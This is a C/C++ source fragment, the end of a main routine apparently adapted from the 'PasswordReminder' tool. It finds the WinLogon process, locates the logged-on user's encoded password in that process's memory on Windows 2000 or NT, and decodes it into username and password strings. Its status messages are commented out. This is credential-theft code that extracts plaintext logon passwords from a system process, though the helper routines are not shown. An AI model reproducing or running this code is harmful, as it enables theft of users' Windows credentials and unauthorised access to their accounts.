// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD WinLogonPID =
FindWinLogon ();
if (WinLogonPID == 0)
{
/* printf
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
printf
("PasswordReminder is unable to find the password in memory.\n");
*/
FreeLibrary (hNtDll);
return (0);
}
/* printf
("The WinLogon process id is %d (0x%8.8lx).\n",
WinLogonPID,
WinLogonPID);
*/
// Set values to check memory block against.
memset
(UserName,
0,
sizeof (UserName));
memset
(UserDomain,
0,
sizeof (UserDomain));
GetEnvironmentVariableW
(L"USERNAME",
UserName,
0x400);
GetEnvironmentVariableW
(L"USERDOMAIN",
UserDomain,
0x400);
// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
FoundPasswordPage =
LocatePasswordPageWin2K
(WinLogonPID,
&PasswordLength);
else
FoundPasswordPage =
LocatePasswordPageWinNT
(WinLogonPID,
&PasswordLength);
if (FoundPasswordPage)
{
if (PasswordLength == 0)
{
Username.Format
("%S/%S",
UserDomain,
UserName);
Pwd="There is no password.";
}
else
{
/*printf
("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
*/ // Decode the password string.
if (IsWin2K ())
DisplayPasswordWin2K (Username,Pwd);
else
DisplayPasswordWinNT (Username,Pwd);
}
}
/*else
printf
("PasswordReminder is unable to find the password in memory.\n");
*/
FreeLibrary (hNtDll);
return (1);
} // main